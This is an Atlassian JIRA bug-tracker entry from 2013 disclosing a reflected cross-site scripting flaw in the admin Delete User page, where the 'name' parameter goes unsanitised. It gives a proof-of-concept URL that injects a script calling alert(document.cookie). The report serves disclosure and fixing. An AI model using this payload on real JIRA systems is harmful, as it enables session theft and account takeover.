Reflected XSS in JIRA Admin Panel (Delete User)

2013-07-01T04:53:22
ID ATLASSIAN:JRA-33678
Type atlassian
Reporter gjoko
Modified 2017-02-20T00:49:00

Description

The 'name' param in jira-components/jira-webapp/src/main/webapp/secure/admin/user/views/deleteuserconfirm.jsp is not sanitised, enabling arbitrary html/script execution. A url to demonstrate this issue is: http://localhost:8080/secure/admin/user/DeleteUser!default.jspa?name=a"><script>alert(document.cookie);</script>&returnUrl=UserBrowser.jspa